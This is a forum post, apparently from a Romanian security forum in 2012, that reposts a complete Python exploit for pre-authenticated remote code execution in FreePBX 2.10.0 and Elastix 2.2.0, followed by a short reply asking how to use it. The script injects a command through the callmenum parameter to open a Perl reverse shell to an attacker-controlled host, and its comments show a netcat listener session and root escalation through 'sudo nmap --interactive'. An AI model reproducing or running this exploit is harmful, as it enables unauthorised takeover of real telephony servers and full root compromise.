The_Arhitect Posted March 24, 2012 Report Posted March 24, 2012 FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit#!/usr/bin/python############################################################# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit# Google Dork: oy vey# Date: March 23rd, 2010# Author: muts# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.# Tested on: multiple# CVE : notyet# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/ # Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt############################################################# Discovered by Martin Tschirsich# http://seclists.org/fulldisclosure/2012/Mar/234# http://www.exploit-db.com/exploits/18649############################################################import urllibrhost="172.16.254.72"lhost="172.16.254.223"lport=443extension="1000"# Reverse shell payloadurl = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'urllib.urlopen(url)# On Elastix, once we have a shell, we can escalate to root:# root@bt:~# nc -lvp 443# listening on [any] 443 ...# connect to [172.16.254.223] from voip [172.16.254.72] 43415# id# uid=100(asterisk) gid=101(asterisk)# sudo nmap --interactive# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )# Welcome to Interactive Mode -- press h <enter> for help# nmap> !sh# id# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)Sursa: FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit Quote
BloodLust Posted August 13, 2012 Report Posted August 13, 2012 cum se foloseste daca se pot da niste detalii ? Quote
